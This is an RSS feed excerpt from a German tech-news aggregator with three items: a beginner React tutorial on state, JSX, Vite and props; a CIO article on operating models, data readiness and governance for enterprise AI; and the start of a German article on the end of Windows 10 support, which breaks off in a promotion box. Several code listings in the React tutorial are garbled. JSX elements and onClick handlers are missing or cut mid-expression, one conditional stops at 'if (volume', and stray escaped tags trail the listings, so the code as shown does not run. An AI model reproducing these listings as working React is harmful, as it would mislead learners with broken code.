<link>https://tsecurity.de/de/3665668/ai-nachrichten/react-tutorial-get-started-with-the-react-javascript-library/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665668/ai-nachrichten/react-tutorial-get-started-with-the-react-javascript-library/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Despite many <a href="https://www.infoworld.com/article/2336227/whats-the-best-javascript-framework.html">worthy contenders</a>, React remains the most popular front-end framework, and a key player in the <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a> development landscape. React is the quintessential <a href="https://www.infoworld.com/article/2338730/what-is-reactive-programming-programming-with-event-streams.html">reactive engine</a>, continually innovating alongside the rest of the industry. A flagship open source project at Facebook, React is now part of Meta Open Source. For developers new to JavaScript and web development, this tutorial will get you started with this vital technology.</p>



<p class="wp-block-paragraph">React is not only a front-end framework, but is a component in full-stack frameworks like <a href="https://www.infoworld.com/article/4078213/next-js-16-features-explicit-caching-ai-powered-debugging.html">Next.js</a>. Newer additions like React server-side rendering (SSR) and React server components (RSC) further blur the line between server and client.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3583477/is-the-react-compiler-ready-for-prime-time.html">Is the React compiler ready for primetime?</a></strong></p>



<h2 class="wp-block-heading">Why React?</h2>



<p class="wp-block-paragraph">React’s prominence makes it an obvious choice for developers just starting out with web development. It is often chosen for its ability to offer a smooth and encompassing developer experience (DX), which distinguishes it from frameworks like <a href="https://www.infoworld.com/article/3962039/what-you-need-to-know-about-angular-react-vue-and-svelte-popular-javascript-frameworks-compared.html">Vue, Angular, and Svelte</a>. It could be said that React’s true “killer feature” is the perks that come with longstanding popularity: learning resources, community support, libraries, and developers are all plentiful in the React ecosystem.</p>



<h2 class="wp-block-heading">Installing React</h2>



<p class="wp-block-paragraph">Real-world React requires running on the server with a build tool, which we will explore in the next section. But to get your feet wet, we can start out with an online playground. There are several high-quality playgrounds for React, including full-blown environments like StackBlitz or Codesandbox. For a quick taste, we will use <a href="https://playcode.io/react">PlayCode React</a>.</p>



<p class="wp-block-paragraph">When you first open it, PlayCode React gives you a basic layout like the one shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/image1.png?w=1024" alt="A screenshot shows the layout of a basic Rwact JavaScript application." class="wp-image-4116902" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">The menu on the left is the file explorer, at the top is the code window, and at the bottom are the console (on the left) and the preview pane (on the right).</p>



<p class="wp-block-paragraph">From this screenshot, you can see how the content of the code is displayed on the preview pane, but this basic layout doesn’t use any variables (or “state,” as it’s known in React). It does let you see some of the plumbing, like the React library import and the exported <code>App</code> function.</p>



<p class="wp-block-paragraph">Modern React is functional. The <code>App</code> function has a return value that is the actual output for the component. The component’s return is specified by <a href="https://www.infoworld.com/article/2335613/intro-to-jsx-html-that-does-javascript.html">JSX</a>, a templating language that lets you use HTML along with variables and JavaScript expressions. Right now, the app just has some simple markup.</p>



<p class="wp-block-paragraph">The classic example you see next is a “Counter” that lets you increase and decrease a displayed value using buttons. We’ll do a slight “Spinal Tap” variation of this, where the counter only goes to 11 and displays a message:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/image2.png?w=1024" alt="A screenshot of a counter app developed in React." class="wp-image-4116903" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">You can take a look at the running example <a href="https://playcode.io/react-playground--019ac165-81fd-74b1-8681-188b66459b9e">here</a>, and the full code for the example is below:</p>



<pre class="wp-block-code"><code>import React, { useState } from 'react';

export function App() {
  // 1. The State
  const [volume, setVolume] = useState(0);

  return (
    <div>
      <h1>Spinal Tap Amp 🎸</h1>
     
      {/* 2. The "View" (Displaying the state) */}
      <div>
        {volume}
      </div>

      <div>
        {/* 3. The Actions */
        <button> setVolume(volume - 1)}&gt;Down</button>
       
        <button> {
          if (volume 
          Up
        </button>
      </div>

      {/* 4. Conditional */}
      {volume === 11 &amp;&amp;
        <p>"Why don't you just make ten louder?"</p>
      }
    </div>
  );
}</code></pre>



<p class="wp-block-paragraph">If you play with the example, you’ll see that moving the buttons changes the value, and the display automatically reflects the change. This is the essential magic of a reactive engine like React. The state is a managed variable that React automatically updates and displays. State is declared like so:</p>



<pre class="wp-block-code"><code>const [volume, setVolume] = useState(0);</code></pre>



<p class="wp-block-paragraph">The syntax is a bit funky if you are coming from straight JavaScript, but most developers can adapt to it quickly. Basically, <code>useState(0)</code> says, with a default value <code>0</code>, give me a variable, <code>volume</code>, and a function to set it, <code>setVolume</code>.</p>



<p class="wp-block-paragraph">To display the value in the view, we use: <code>{volume}</code>.</p>



<p class="wp-block-paragraph">To modify the value, we use button event handlers. For example, to increment, we’d do:</p>



<pre class="wp-block-code"><code>To modify the value, we use buttons event handlers.  For example, to increment:

onClick={() =&gt; setVolume(volume + 1)</code></pre>



<p class="wp-block-paragraph">Here we’ve directly modified the volume state, and React will update accordingly. If we wanted to, we could call a function (for example, if the logic were more involved).</p>



<p class="wp-block-paragraph">Finally, when the value reaches 11, we display a message. This syntax is idiomatic React, and uses an embedded JavaScript equality check:</p>



<pre class="wp-block-code"><code>{volume === 11 &amp;&amp;
  <p>"Why don't you just make ten louder?"</p>
}</code></pre>



<p class="wp-block-paragraph">The check says, if volume is 11, then display the <code><p></p></code> markup.</p>



<h2 class="wp-block-heading">Using a build tool with React</h2>



<p class="wp-block-paragraph">Once upon a time, when NVIDIA was nothing but a graphics card, it was quite a bit of work assembling a good build chain for React. These days, the process is much simpler, and the once ubiquitous <code>create-react-app</code> option is no more. <a href="https://www.infoworld.com/article/2266193/7-tools-transforming-javascript-development.html">Vite</a> is now the standard choice for launching a new app from the React terminal, so that’s the approach you’ll learn here.</p>



<p class="wp-block-paragraph">With that said, there are a few alternatives worth mentioning. <a href="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html">VS Code</a> has extensions that will provide you with templates or scaffolding, but what’s becoming more common is <a href="https://www.infoworld.com/article/3973969/knowing-when-to-use-ai-coding-assistants.html">using an AI coding assistant</a>. A tool like Copilot, ChatGPT, or Gemini can take a prompt describing the basics of the application in question, including the instruction to use React, and produce a basic React layout for you. AI assistants are available in both command-line and VS Code extension flavors. Or, for an even more forward-looking option, you could use something like <a href="https://www.infoworld.com/article/3981588/putting-agentic-ai-to-work-in-firebase-studio.html">Firebase Studio</a>.</p>



<p class="wp-block-paragraph">But enough about alternatives—Vite is the standard for a reason. It is repeatable, capable, and fast. To launch a new Vite app, you just enter the following in your command line:</p>



<pre class="wp-block-code"><code>$ npm create vite@latest</code></pre>



<p class="wp-block-paragraph">The interactive tool will walk you through the process, starting with selecting React as your technology:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/image3.png?w=1024" alt="A screenshot of the Vite CLI showing the option to select React." class="wp-image-4116905" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">Use your own preferences for the other options (like using <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a> versus JavaScript) and accept the option to install and launch the app immediately. Afterward, you’ll see a simple demo like this one:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/image4.png?w=1024" alt="A screenshot showing the Vite demo app built with React." class="wp-image-4116907" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">The demo app has a counter component like the one we built earlier. If you Ctrl-c (or Cmd-c) to kill the Vite process running in the terminal, you can <code>cd</code> into the new directory. From there, you can see where the counter component is defined, in <code>src/App.jsx</code> (or <code>App.tsx</code> if you have selected TypeScript like I have).</p>



<p class="wp-block-paragraph">It’s worth looking at that file to see how React appears on the server:</p>



<pre class="wp-block-code"><code>src/App.tsx
import { useState } from 'react'
import reactLogo from './assets/react.svg'
import viteLogo from '/vite.svg'
import './App.css'

function App() {
  const [count, setCount] = useState(0)

  return (
    
      <div>
        <a href="https://vite.dev/" target="_blank">
          <img src="https://www.infoworld.com/article/2253289/%7BviteLogo%7D" alt="Vite logo">
        </a>
        <a href="https://react.dev/" target="_blank">
          <img src="https://www.infoworld.com/article/2253289/%7BreactLogo%7D" alt="React logo">
        </a>
      </div>
      <h1>Vite + React</h1>
      <div>
        <button> setCount((count) =&gt; count + 1)}&gt;
          count is {count}
        </button>
        <p>
          Edit <code>src/App.tsx</code> and save to test HMR
        </p>
      </div>
      <p>
        Click on the Vite and React logos to learn more
      </p>
    &gt;
  )
}

export default App&lt;/code&gt;</code></pre>



<p class="wp-block-paragraph">Notice we export the App as a module, which is used by the <code>src/main.tsx</code> file to display the component in the view. That file creates the bridge between the respective worlds of React and HTML:</p>



<pre class="wp-block-code"><code>import { StrictMode } from 'react'
import { createRoot } from 'react-dom/client'
import './index.css'
import App from './App.tsx'

createRoot(document.getElementById('root')!).render(
  
    
  ,
)</code></pre>



<p class="wp-block-paragraph">Don’t worry too much about the details of how React bootstraps itself with <code>createRoot</code> and the <code>render</code> call (which you won’t have to interact with on a regular basis). The important thing is how the <code>App</code> component is imported and then used with the JSX.</p>



<p class="wp-block-paragraph"><strong>Note</strong></p>



<p class="wp-block-paragraph"><a href="https://react.dev/reference/react/StrictMode">Strict mode</a> adds warning during dev mode to help you catch component bugs early.</p>



<p class="wp-block-paragraph">There are a few rules to bear in mind when using JSX, the templating language of React:</p>



<ul class="wp-block-list">
<li>HTML elements are lowercase (<code><div>, <code></code>), but components are uppercase (<code></code>, <code></code>).



<li>You can’t just type “class” in JSX; instead, use <code>className</code>; e.g., <code><div>.



<li>To access the realm of JavaScript (and the application state) from within JSX, use curly braces: <code>{2 + 2 != 5}</code>.</li>




<h2 class="wp-block-heading">React components and props</h2>



<p class="wp-block-paragraph">The main organizational concept in React is the <em>component</em>. Components are used to contain the functionality for a part of the view within a self-contained package. We’ve seen a component in action already with <code></code> but it might be a little obscure, so let’s add another simple component to enhance the demonstration. This component also lets us explore another key part of React: Props.</p>



<p class="wp-block-paragraph">To start, let’s create a display of the counter value influenced by the Rob Reiner movie <em>This Is Spinal Tap</em>. To start, we create a new file at <code>src/VolumeDisplay.jsx</code>:</p>



<pre class="wp-block-code"><code>// src/VolumeDisplay.jsx

export function VolumeDisplay({ level }) {
  return (
    <div>
      {/* The Dial */}
      <div>= 11 ? '#d32f2f' : '#f0f0f0',
        color: level &gt;= 11 ? 'white' : 'black',
        transition: 'all 0.2s ease'
      }}&gt;
        {level}
      </div>

      {/* The Message */}
      {level &gt;= 11 &amp;&amp; (
        <p>
          "These go to eleven." 🤘
        </p>
      )}
    </div>
  );
}</code></pre>



<p class="wp-block-paragraph">This is a simple display but there are a couple of things worth noting about it.</p>



<p class="wp-block-paragraph">One is that we accept a prop (a property) “from above” with <code>VolumeDisplay({ level })</code>. This tells whatever parent component uses this one that <code>VolumeDisplay</code> accepts a single property, called <code>level</code>. <code>VolumeDisplay</code> uses the property by displaying it (though it adds a bit of fancying up using conditional logic like we have already seen).</p>



<p class="wp-block-paragraph">The way we define the CSS values, inside the double braces, <code>{{ }}</code>, and as a map of value is idiomatic React. (It isn’t essential at this point to grasp why it works that way, but basically, it is the JSX token <code>{ }</code> with a JavaScript map of CSS values using JavaScript-friendly camel-cased names, like <code>justifyContent</code>.)</p>



<p class="wp-block-paragraph">Now, to utilize this component, we can go to <code>App.jsx</code>, and make two changes:</p>



<pre class="wp-block-code"><code>import { useState } from 'react'
import reactLogo from './assets/react.svg'
import viteLogo from '/vite.svg'
import './App.css'
// 1. Import our new component
import { VolumeDisplay } from './VolumeDisplay'

function App() {
  const [count, setCount] = useState(0)

  return (
    
      <div>
        <a href="https://vite.dev/" target="_blank">
          <img src="https://www.infoworld.com/article/2253289/%7BviteLogo%7D" alt="Vite logo">
        </a>
        <a href="https://react.dev/" target="_blank">
          <img src="https://www.infoworld.com/article/2253289/%7BreactLogo%7D" alt="React logo">
        </a>
      </div>
      <h1>Vite + React</h1>
      <div>
        <button> setCount((count) =&gt; count + 1)}&gt;
          count is {count}
        </button>
        {/* 2. Pass the 'count' state into the 'level' prop */}
      
        <p>
          Edit <code>src/App.tsx</code> and save to test HMR
        </p>
      </div>
      <p>
        Click on the Vite and React logos to learn more
      </p>
    &gt;
  )
}

export default App&lt;/code&gt;</code></pre>



<p class="wp-block-paragraph">Here, we’ve done two things: imported the new component and used it in the view.</p>



<p class="wp-block-paragraph">Notice, also, that the <code></code> line passes the existing count state variable into <code>VolumeDisplay</code> as a prop. React will do the work of ensuring that whenever count changes, the <code>VolumeDisplay</code> will also be updated, including any dependent logic such as the conditional statements.</p>



<p class="wp-block-paragraph">Now, if we run the code like so:</p>



<pre class="wp-block-code"><code>$ npm run dev</code></pre>



<p class="wp-block-paragraph">We get what you see in the screenshot below:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/image5.png?w=1024" alt="A screenshot of the running demo app built with Vite and React." class="wp-image-4116908" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">The world is now your oyster, at least within the realm of JavaScript web development. Not only is React wildly popular, its basic ideas are applicable to a host of other innovative frameworks, including <a href="https://www.infoworld.com/article/2265950/hands-on-with-svelte.html">Svelte</a> and <a href="https://www.infoworld.com/article/2271109/hands-on-with-the-solid-javascript-framework.html">Solid</a>. (To get some idea of the alternatives, just type <code>npm create vite@latest</code> and look at all the available technologies.) Now that you have a basic introduction, a good next step for learning would be to add an <code></code> control that allows typing in the volume manually. Happy coding!</p>
</div></code></li></div></code></li></ul></div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs must rethink operating models to unlock AI at scale]]></title>
<description><![CDATA[Almost every company has a board or executive AI mandate. Vendors are rolling out agentic AI platforms. The pressure to move is intense.



But the reality on the ground looks different. Eighty-three percent of organizations say data quality is their top AI challenge, and 74% struggle to demonstr...]]></description>
<link>https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</guid>
<pubDate>Mon, 13 Jul 2026 12:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Almost every company has a <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">board or executive AI mandate</a>. Vendors are rolling out agentic AI platforms. The pressure to move is intense.</p>



<p>But the reality on the ground looks different. Eighty-three percent of organizations say <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">data quality is their top AI challenge</a>, and 74% struggle to demonstrate ROI, according to Lopez Research. And only 21% report having a mature <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">governance model for AI agents</a>, per Deloitte’s <a href="https://www.deloitte.com/us/en/about/press-room/state-of-ai-report-2026.html" rel="nofollow">2026 State of Enterprise AI</a> report.</p>



<p>“Agentic AI is real, and vendors’ offerings are very real, too,” says <a href="https://www.forrester.com/analyst-bio/boris-evelson/BIO1737" rel="nofollow">Boris Evelson</a>, vice president and principal analyst at Forrester. “However, most enterprises are still not ready to adopt at scale.”</p>



<p><a href="https://www.westmonroe.com/our-team/david-hilborn" rel="nofollow">Dave Hilborn</a>, who leads West Monroe’s Organization, People &amp; Change practice, frames it as a race with three arrows moving forward — one representing AI and tech evolution, one representing organizations and people, and one representing data. “The AI arrow is far out ahead,” he says. “That delta is the readiness gap.”</p>



<p>The gap <a href="https://www.cio.com/article/4192383/its-not-the-it-holding-ai-back-its-the-business-processes.html">isn’t the technology</a>. It’s the foundational work most organizations haven’t done: data readiness, operating models, governance, skills, and culture. The companies making progress aren’t waiting for vendors to solve these problems. They’re tackling the unglamorous work themselves.</p>



<h2 class="wp-block-heading">AI doesn’t tolerate ambiguity</h2>



<p>AI readiness can be framed across six levels — from data foundation at the base to <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">reinvented business experiences</a> at the top, says <a href="https://www.linkedin.com/in/afsheantalasaz/" rel="nofollow">Afshean Talasaz</a>, former CIO at Colonial Pipeline and now an executive advisor. One of the key areas that doesn’t always get the attention it needs is the operating model.<strong></strong></p>



<p>“The technology playbooks of the past don’t work in the AI world,” Talasaz says. “Those areas were able to tolerate more ambiguity between business and tech teams. AI doesn’t tolerate the same level of ambiguity. It needs clarity.”</p>



<p>That demands a different kind of partnership between IT and the business. AI systems learn from data — records and measurements of what’s actually happening in the business — and then operate within business processes. Unlike traditional software, which is built based on user requirements, AI is sandwiched between the business that produces the data and the business that consumes the outputs.</p>



<p>“AI is requiring IT and business teams to work more closely together, to be clearer about what AI will and will not do — that really close partnership is crucial,” Talasaz says. “It’s not something that will always naturally evolve. It requires a lot of intentionality about how teams need to work together to deliver outcomes.”</p>



<p>The <a href="https://www.cio.com/article/3801027/10-ai-strategy-questions-every-cio-must-answer.html">AI questions CIOs must answer</a> aren’t just technical. Do we have the right operating model? Have we balanced governance and standard operating procedures within the model? Have we organized teams appropriately? All this must be designed within the context of what the business actually needs.</p>



<p>Too many organizations are <a href="https://www.cio.com/article/4159287/most-companies-are-stuck-on-ai-chat.html">bolting AI onto existing processes</a> without redefining roles or workflows, Forrester’s Evelson. “Organizations can either incrementally enhance existing workflows by augmenting capabilities with AI or pursue a more transformative approach by redesigning the process end-to-end.”</p>



<p>The companies getting value are doing the latter.</p>



<h2 class="wp-block-heading">Data debt comes due</h2>



<p>Data readiness remains the most common barrier to scaling AI. “We’ve never fixed this data quality problem in most organizations,” says <a href="https://www.lopezresearch.com/" rel="nofollow">Maribel Lopez</a>, founder and principal analyst at Lopez Research, “and it comes back to haunt a company in spades as they move to AI.”</p>



<p>At Levi Strauss, the foundational work came first. “If you think about the Levi’s business, it’s quite complex — 100 countries, over 3,000 stores, multiple business models,” says <a href="https://www.levistrauss.com/who-we-are/leadership/jason-gowans/" rel="nofollow">Jason Gowans</a>, the company’s chief digital and technology officer. “You can imagine the complexity of gathering all that data to understand how the business is performing. The idea of this single source of truth — that’s been the biggest thing.”</p>



<p>Levi’s now has more than 1,100 standard operating procedures that govern how work gets done on top of SAP. “That’s fertile material to feed to LLMs on how work gets done,” Gowans says.The results are tangible: partner onboarding that once took three to six months to set up EDI exchanges now takes days.</p>



<p>At contract manufacturing company Jabil, <a href="https://www.linkedin.com/in/chase-christensen-b0447/" rel="nofollow">Chase Christensen</a>, segment CIO, took a similar path. “We had to get everyone to understand where the source data resides, put tech in place so consumption is easier, and drive ownership around data and decision rights — so 140,000 employees don’t feel empowered to create their own data sources that fall out of line.”</p>



<p>The data challenge goes beyond quality, Evelson notes. <a href="https://www.cio.com/article/4104444/8-tips-for-rebuilding-an-ai-ready-data-strategy.html">Most organizations’ data isn’t AI-ready</a>; it hasn’t been prepared for how AI systems consume and learn from information. “Data is siloed, poorly governed, and hard to discover, integrate, and trust,” he says.</p>



<p>Forrester research shows that 45% of data and analytics decision-makers were adopting vector databases in 2025, and 53% were adopting graph databases — investments that signal recognition of how much data architecture needs to evolve. The firm recommends a balanced approach: roughly 48% of AI spending on foundations such as data management and engineering, and 52% on consumption, including analytics, governance, and applications.</p>



<p>But even as organizations work to prepare existing data, AI is creating new challenges. Users leveraging AI tools are generating new forms of data and information that never make it into corporate databases, West Monroe’s Hilborn notes.</p>



<p>“There are explosions of new data, content, and insights being created on the periphery of these data lakes,” he says. “The challenge is how do you capture that and leverage it.”</p>



<h2 class="wp-block-heading">Who’s sponsoring this?</h2>



<p>Even when data is in order, many AI initiatives stall due to how they’re sponsored and funded.</p>



<p>“Enterprise data, analytics, and AI programs succeed when business CxOs sponsor them because they are accountable for business outcomes, not just technology delivery,” Forrester’s Evelson says. “IT-led initiatives often become siloed or tool-centric, whereas business sponsorship ensures alignment to enterprise strategy, prioritization of end-to-end use cases, and a focus on decisions and actions rather than insights alone.”</p>



<p>Too often, AI is still treated as a series of disconnected use cases rather than a sustained, multi-year investment. Evelson calls this the “use case trap” — organizations overindex on individual projects and miss the enterprise-wide compounding impact. That leads to fragmented priorities, inconsistent adoption, and difficulty demonstrating ROI.</p>



<p>Leadership readiness is a distinct layer of AI preparedness, Talasaz says. “Are leaders prepared to provide a vision of reinvented business experiences that become the north star?” he asks. “Leadership teams, at various levels of the organization, need to articulate what a reinvented business looks like so teams have the direction and support to build differentiating capabilities.”</p>



<p>Levi’s offers a counterexample. AI is a CEO priority there. At the last quarterly offsite, the execs were building agents. “When you’re committed to upskilling the workforce, you’re better served to answer how to rewire processes with AI at the core,” Gowans says. “It starts at the top. It has to be an exec priority.”</p>



<h2 class="wp-block-heading">Fear, literacy, and two types of AI</h2>



<p>Technical talent is only part of the equation. Organizations also need to <a href="https://www.cio.com/article/4016354/cios-tackle-the-ai-change-management-challenge.html">address change management</a>.</p>



<p>“We saw it with the AI boom — fear about jobs, not knowing what AI did,” says Jabil’s Christensen. “The key is demystifying AI. We doubled down and focused on AI literacy. We want everyone to understand how it was put together, and that removed a lot of that fear. That’s been the biggest hurdle.”</p>



<p>Different types of AI require different skills and governance, Talasaz says. “General use focuses on productivity on the desktop,” he says. “Integrated AI — industrial-capable AI embedded within core business processes — requires different skills, capabilities, and governance.”</p>



<p>For desktop AI, training and guardrails help employees be successful — what Talasaz calls “bumpers,” like in bowling. Organizations need to <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">help employees through reskilling and guidance</a>. “You have tools in a toolbox,” he says. “It’s important to know when to use a power tool versus when you need a screwdriver.”</p>



<p>But for integrated AI embedded in core processes, the stakes are higher. “Business leaders responsible for business outcomes based on AI-driven processes need to be fully aware of both the benefits and risks that come along with using these tools,” Talasaz says.</p>



<p>That distinction matters for governance, too. Lower-, medium-, and high-risk AI use cases may require <a href="https://www.csoonline.com/article/4188573/rethinking-the-balance-between-ai-oversight-and-innovation.html">different ways of working and different risk management approaches</a>. “Deploying AI in potentially high-risk or high-cost areas of the business requires a higher level of rigor,” Talasaz says. “That’s different than building something that helps write my emails.”</p>



<h2 class="wp-block-heading">From POC to production</h2>



<p>Perhaps the biggest readiness gap is the transition <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html">from proof of concept to production</a>. “It requires such a different approach,” Talasaz says. “A successful proof of concept can create a lot of excitement, but when teams are unprepared to build and scale, it can create the potential to over-promise and under-deliver.”</p>



<p>The operating model that works for experimentation doesn’t work for production at scale. Proofs of concept are designed to demonstrate the efficacy of ideas and the underlying technology. But building, scaling, and sustaining technology in the business requires operating models, standards, roles, and skills that many organizations haven’t developed. Intentionally designed operating models reduce the cost of learning, improve execution, and increase delivery velocity, says Talasaz.</p>



<p>But there’s no one-size-fits-all answer. “A business that needs to build capabilities in a marketplace moving very fast requires one kind of operating model,” Talasaz says. “A business that can take longer to develop business capabilities and adapt to market changes can choose a different operating model. It’s important to design ways of working tailored to what the business needs and the speed at which the business needs to leverage technology to be successful.”</p>



<p>Jabil is navigating this journey as part of its move to SAP’s cloud ERP through RISE, scaling from $29 billion to $34 billion in revenue while keeping selling, general, and administrative (SG&amp;A) expenses relatively flat — in part by layering generative AI onto predictive analytics capabilities built over years.</p>



<p>“We started years ago with computer vision to drive product quality,” Christensen says. “As gen AI blew up, we took the predictive analytics we had <a href="https://www.cio.com/article/193580/upskilling-transforms-jabil-employees-into-data-scientists.html">built over the years</a> and imbued them with gen AI. We’ve implemented the basics, and now we’re looking for complex scenarios.”</p>



<h2 class="wp-block-heading">Governance built in, not bolted on</h2>



<p>Governance is often treated as a policy document or committee. It should be embedded in the operating model itself, Talasaz argues.</p>



<p>“The operating model doesn’t always get the attention it needs,” he says. “Policies and committees are useful, but they should handle larger enterprise risks. Most of the governance should be embedded in the operating model to ensure you’re getting outcomes you want.”</p>



<p>That might mean peer review built into the development process, bias checks before deployment, or clear escalation paths for high-risk use cases. When governance is separate from the operating model, it tends to slow things down. When it’s integrated, it becomes how work naturally gets done, says Talasaz.</p>



<p>Governance at the agent level matters, too, Levi’s Gowans says. “Know what agents have been deployed, who authored them, and who’s responsible,” he says, noting that the company has established a registry to understand what agents it has operating within its networks.</p>



<p>The challenges of AI governance are unique, Lopez of Lopez Research says. “Very few people have the governance stack required to say they did the right things with AI,” she says. “<a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Non-human identity</a> and access control is totally different and, frankly, evolving so quickly that no one knows what to do.”</p>



<p>The challenge is ultimately a trade-off, Forrester’s Evelson says. “Push agentic AI capabilities too far, and you risk creating a governance and compliance nightmare,” he says. “Tighten controls too aggressively, and you stifle innovation. Best practices for <a href="https://www.cio.com/article/4188566/cios-rethink-the-balance-between-ai-oversight-and-innovation.html">striking the right balance</a> are still being discovered.”</p>



<h2 class="wp-block-heading">It takes a team</h2>



<p>The AI readiness gap isn’t about technology — it’s about the work organizations have been deferring for years. Data quality. Operating models. Executive sponsorship. Skills and culture. Governance embedded in process.</p>



<p>“Once you progress from everyone using Copilot to putting agents in production, then you realize the need for business context,” Gowans of Levi Strauss says.</p>



<p>It’s a shared journey requiring all teams to understand what’s required, Talasaz says. “It involves helping people understand what it takes from all sides — the technology itself, the operating model, the skills and talents needed — but also working with business leaders on the art of the possible,” he says. “Helping them understand both the benefits and the responsibility of deploying this tech.”</p>



<p>A colleague of his calls AI “the ultimate executive team sport.”</p>



<p>“It requires people to do it well and manage it,” Talasaz says.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 10 weiter nutzen oder upgraden? Unsere Empfehlungen für wirklich jeden Nutzer]]></title>
<description><![CDATA[Am 12. Oktober 2027 beendet Microsoft für Privatanwender den erweiterten Support (den man als Extended Security Updates, ESU, bezeichnet) für Windows 10 (Version 22H2 Home, Professional, Pro Education oder Workstations Edition). Nur Unternehmenskunden bekommen gegen Bezahlung noch länger Sicherhe...]]></description>
<link>https://tsecurity.de/de/3664653/windows-tipps/windows-10-weiter-nutzen-oder-upgraden-unsere-empfehlungen-fuer-wirklich-jeden-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664653/windows-tipps/windows-10-weiter-nutzen-oder-upgraden-unsere-empfehlungen-fuer-wirklich-jeden-nutzer/</guid>
<pubDate>Mon, 13 Jul 2026 10:39:26 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Am <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">12. Oktober 2027 beendet Microsoft für Privatanwender</a> den erweiterten Support (den man als <a href="https://www.microsoft.com/de-de/windows/extended-security-updates">Extended Security Updates, ESU</a>, bezeichnet) für Windows 10 (Version 22H2 Home, Professional, Pro Education oder Workstations Edition). Nur Unternehmenskunden bekommen gegen Bezahlung noch länger Sicherheits-Updates, und zwar bis 2028.</p>



<p>Das bedeutet: Nach dem 13. Oktober 2027 (nach der ursprünglichen Planung sollte bereits am 12.10.2026 Schluss sein, <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">doch Microsoft verlängerte den Supportzeitraum für Windows 10 noch einmal) </a>erhalten Sie als Privatanwender für Ihren Windows-10-Rechner keine Sicherheits-Updates mehr. Neu entdeckte Sicherheitslücken in Windows 10 schließt Microsoft dann grundsätzlich nicht mehr, stattdessen bleiben diese offen und können von Angreifern ausgenutzt werden.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Laptop bremst Sie aus? Dieses 2-in-1 lässt Sie produktiver arbeiten</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-1-1.png" loading="lazy"></div><p class="ppl_text">
